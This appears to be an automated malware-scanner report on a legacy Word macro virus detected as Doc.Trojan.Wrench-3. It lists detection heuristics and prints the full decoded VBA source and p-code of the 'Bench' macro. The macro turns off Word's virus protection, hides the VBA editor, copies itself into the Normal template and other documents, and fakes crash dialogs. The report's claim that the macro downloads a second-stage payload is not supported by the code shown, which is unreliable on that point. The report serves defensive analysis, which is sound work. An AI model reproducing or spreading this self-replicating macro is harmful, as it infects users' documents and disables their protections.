MALICIOUS
376
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose functions, which are commonly used to execute malicious code upon opening or closing the document. The VBA code attempts to export and import components named 'Bench' and 'BenchFrm' to the C drive, suggesting an attempt to download and execute a second-stage payload. The presence of legacy macro virus markers and the ClamAV detection further support its malicious nature.
Heuristics 9
-
ClamAV: Doc.Trojan.Wrench-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Wrench-3
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. OLE file is 38,312 bytes but its declared streams total only 0 bytes — 38,312 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThis finding applies to a carved embedded Office document found at a nonzero offset inside the submitted file, not directly to the top-level document. The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7843 bytes |
SHA-256: 7684acad9bd9c3278247808c558fc973c1f870a6b9eb6c2ef82fba2c632cb394 |
|||
|
Detection
ClamAV:
Doc.Trojan.Wrench-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Bench"
Function Stealth()
On Error Resume Next
Application.Options.VirusProtection = False
Application.Options.ConfirmConversions = False
CommandBars("Visual Basic").Protection = msoBarNoCustomize
CommandBars("Visual Basic").Visible = False
CommandBars("Visual Basic").Enabled = False
End Function
Function BenchCore()
On Error Resume Next
If MacroContainer = NormalTemplate Then
Set Carrier = NormalTemplate.VBProject.VBComponents
Set host = ActiveDocument.VBProject.VBComponents
Else
Set Carrier = ActiveDocument.VBProject.VBComponents
Set host = NormalTemplate.VBProject.VBComponents
End If
For x = 1 To 2
If x = 1 Then MyMacroName = "Bench" Else MyMacroName = "BenchFrm"
If host(MyMacroName).Name <> MyMacroName Then
Carrier(MyMacroName).Export "c:\" & MyMacroName
host.Import "c:\" & MyMacroName
End If
Next x
Kill "c:\Bench*"
End Function
Sub ViewVBCode()
On Error Resume Next
ActiveDocument.Saved = True
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Application.Quit
End Sub
Sub AutoOpen()
On Error Resume Next
Call Stealth
Call BenchCore
End Sub
Sub AutoClose()
On Error Resume Next
Call BenchCore
If Left$(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.Saved = True Else ActiveDocument.Save
End Sub
Sub ToolsMacro()
End Sub
Sub HelpAbout()
BenchFrm.Show
End Sub
Sub FormatStyle()
End Sub
Sub FileClose()
Call BenchCore
End Sub
Sub FileNew()
Call BenchCore
Dialogs(wdDialogFileNew).Show
End Sub
Sub FileOpen()
Call BenchCore
Dialogs(wdDialogFileOpen).Show
End Sub
Sub Organizer()
ActiveDocument.Saved = True
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
Application.Quit
End Sub
Attribute VB_Name = "BenchFrm"
Attribute VB_Base = "0{E1D47D84-DFCF-11D3-ACD9-900936D3B526}{E1D47D7E-DFCF-11D3-ACD9-900936D3B526}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Unload Me
End Sub
Private Sub Image1_Click()
MsgBox "I'm Psycho Sushi!!!", vbInformation, "Sushi Power!"
End Sub
' Processing file: /tmp/qstore_76zvx2yl
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Bench - 4184 bytes
' Line #0:
' FuncDefn (Function Stealth())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitVarSpecial (False)
' Ld Application
' MemLd Options
' MemSt VirusProtection
' Line #3:
' LitVarSpecial (False)
' Ld Application
' MemLd Options
' MemSt ConfirmConversions
' Line #4:
' Ld msoBarNoCustomize
' LitStr 0x000C "Visual Basic"
' ArgsLd CommandBars 0x0001
' MemSt Protection
' Line #5:
' LitVarSpecial (False)
' LitStr 0x000C "Visual Basic"
' ArgsLd CommandBars 0x0001
' MemSt Visible
' Line #6:
' LitVarSpecial (False)
' LitStr 0x000C "Visual Basic"
' ArgsLd CommandBars 0x0001
' MemSt Enabled
' Line #7:
' EndFunc
' Line #8:
' FuncDefn (Function BenchCore())
' Line #9:
' OnError (Resume Next)
' Line #10:
' Ld MacroContainer
' Ld NormalTemplate
' Eq
' IfBlock
' Line #11:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set Carrier
' Line #12:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set host
' Line #13:
' ElseBlock
' Line #14:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set Carrier
' Line #15:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set host
' Line #16:
' EndIfBlock
' Line #17:
' Line #18:
' StartForVariable
' Ld x
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0002
' For
' Line #19:
' Ld x
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0005 "Bench"
' St MyMacroName
' Else
' BoSImplicit
' LitStr 0x0008 "BenchFrm"
' St MyMacroName
' EndIf
' Line #20:
' Ld MyMacroName
' ArgsLd host 0x0001
' MemLd New
' Ld MyMacroName
' Ne
' IfBlock
' Line #21:
' LitStr 0x0003 "c:\"
' Ld MyMacroName
' Concat
' Ld MyMacroName
' ArgsLd Carrier 0x0001
' ArgsMemCall Export 0x0001
' Line #22:
' LitStr 0x0003 "c:\"
' Ld MyMacroName
' Concat
' Ld host
' ArgsMemCall Import 0x0001
' Line #23:
' EndIfBlock
' Line #24:
' StartForVariable
' Ld x
' EndForVariable
' NextVar
' Line #25:
' Line #26:
' LitStr 0x0009 "c:\Bench*"
' ArgsCall Kill 0x0001
' Line #27:
' Line #28:
' EndFunc
' Line #29:
' FuncDefn (Sub ViewVBCode())
' Line #30:
' OnError (Resume Next)
' Line #31:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #32:
' LitStr 0x0043 "This program has performed an illegal operation and will shut down."
' Ld vbCritical
' LitStr 0x000E "Microsoft Word"
' ArgsCall MsgBox 0x0003
' Line #33:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #34:
' EndSub
' Line #35:
' FuncDefn (Sub AutoOpen())
' Line #36:
' OnError (Resume Next)
' Line #37:
' ArgsCall (Call) Stealth 0x0000
' Line #38:
' ArgsCall (Call) BenchCore 0x0000
' Line #39:
' EndSub
' Line #40:
' FuncDefn (Sub AutoClose())
' Line #41:
' OnError (Resume Next)
' Line #42:
' ArgsCall (Call) BenchCore 0x0000
' Line #43:
' Ld ActiveDocument
' MemLd New
' LitDI2 0x0008
' ArgsLd LBound$ 0x0002
' LitStr 0x0008 "Document"
' Ne
' If
' BoSImplicit
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Else
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #44:
' EndSub
' Line #45:
' FuncDefn (Sub ToolsMacro())
' Line #46:
' EndSub
' Line #47:
' FuncDefn (Sub HelpAbout())
' Line #48:
' Ld BenchFrm
' ArgsMemCall Show 0x0000
' Line #49:
' EndSub
' Line #50:
' FuncDefn (Sub FormatStyle())
' Line #51:
' EndSub
' Line #52:
' FuncDefn (Sub FileClose())
' Line #53:
' ArgsCall (Call) BenchCore 0x0000
' Line #54:
' EndSub
' Line #55:
' FuncDefn (Sub FileNew())
' Line #56:
' ArgsCall (Call) BenchCore 0x0000
' Line #57:
' Ld wdDialogFileNew
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #58:
' EndSub
' Line #59:
' FuncDefn (Sub FileOpen())
' Line #60:
' ArgsCall (Call) BenchCore 0x0000
' Line #61:
' Ld wdDialogFileOpen
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #62:
' EndSub
' Line #63:
' FuncDefn (Sub Organizer())
' Line #64:
' LitVarSpecial (True)
' Ld ActiveDocument
' MemSt Saved
' Line #65:
' LitStr 0x0043 "This program has performed an illegal operation and will shut down."
' Ld vbCritical
' LitStr 0x000E "Microsoft Word"
' ArgsCall MsgBox 0x0003
' Line #66:
' Ld Application
' ArgsMemCall Quit 0x0000
' Line #67:
' EndSub
' Macros/VBA/BenchFrm - 1808 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' FuncDefn (Private Sub CommandButton1_Click())
' Line #23:
' Ld id_FFFF
' ArgsCall Unlock 0x0001
' Line #24:
' EndSub
' Line #25:
' FuncDefn (Private Sub Image1_Click())
' Line #26:
' LitStr 0x0013 "I'm Psycho Sushi!!!"
' Ld vbInformation
' LitStr 0x000C "Sushi Power!"
' ArgsCall MsgBox 0x0003
' Line #27:
' EndSub
|
|||
embedded_office_off00008a58.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x8A58 | 38312 bytes |
SHA-256: 0c3d117270f300665e7b29ea5f2b42ce807b7788071996cf4da71d755d21c933 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.